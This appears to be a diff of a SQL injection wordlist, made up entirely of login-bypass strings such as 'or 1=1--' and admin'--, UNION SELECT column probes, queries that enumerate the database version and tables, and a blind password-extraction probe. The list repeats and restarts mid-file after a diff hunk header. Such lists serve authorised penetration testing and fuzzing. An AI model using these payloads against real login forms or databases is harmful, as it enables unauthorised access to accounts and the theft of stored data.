|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
